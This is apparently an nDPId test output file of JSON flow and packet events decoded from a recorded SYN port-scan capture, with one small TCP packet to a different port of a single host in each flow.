-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsffkAACoGoHmsEAAIQA2GNIzTlZTdU4MZAAAAAGACDACW9wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsyFAAADUGSyKsEAAIQA2GNIzSF9TdUoMYAAAAAGACCAAYuwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsH38AADoG7vOsEAAIQA2GNIzSAtDdUoMYAAAAAGACDAApvwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsR7gAAC0G07qsEAAIQA2GNIzSH1\/dUoMYAAAAAGACCAARMAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsglEAADIGlCGsEAAIQA2GNIzSAJLdUoMYAAAAAGACDAAr\/QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsHb4AADcG87SsEAAIQA2GNIzSAZfdUoMYAAAAAGACEAAm+AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsyacAADgGRsusEAAIQA2GNIzSDPvdUoMYAAAAAGACBAAnlAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsUY0AADcGv+WsEAAIQA2GNIzSYODdUoMYAAAAAGACEADHrgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsEx8AADUGAFSsEAAIQA2GNIzSHz\/dUoMYAAAAAGACCAARUAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsi8gAACsGkaqsEAAIQA2GNIzSS5bdUoMYAAAAAGACEADc+AAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsv2QAACUGZA6sEAAIQA2GNIzS8czdUoMYAAAAAGACCAA+wgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsnmIAADoGcBCsEAAIQA2GNIzSAlHdUoMYAAAAAGACDAAqPgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAs8qkAAC8GJsmsEAAIQA2GNIzSF3LdUoMYAAAAAGACEAARHQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0kAACYGYymsEAAIQA2GNIzSBR7dUoMYAAAAAGACDAAncQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsRIMAACsG2O+sEAAIQA2GNIzSH0jdUoMYAAAAAGACEAAJRwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsg2UAACwGmQ2sEAAIQA2GNIzSBFrdUoMYAAAAAGACBAAwNQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsvfoAADoGUHisEAAIQA2GNIzTBC3dU4MZAAAAAGACDAAoXwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVvEAADUGvIGsEAAIQA2GNIzTDx3dU4MZAAAAAGACCAAhbwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsc5UAACcGrd2sEAAIQA2GNIzTF3ndU4MZAAAAAGACEAAREwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGAAACYGlhKsEAAIQA2GNIzTEJLdU4MZAAAAAGACDAAb+gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAs2QcAAC8GQGusEAAIQA2GNIzTDSrdU4MZAAAAAGACEAAbYgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAspzIAACYGe0CsEAAIQA2GNIzTH0HdU4MZAAAAAGACDAANSwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVwYAADgGuWysEAAIQA2GNIzTwAHdU4MZAAAAAGACBAB0igAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsctcAACcGrpusEAAIQA2GNIzTAtLdU4MZAAAAAGACEAAlugAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 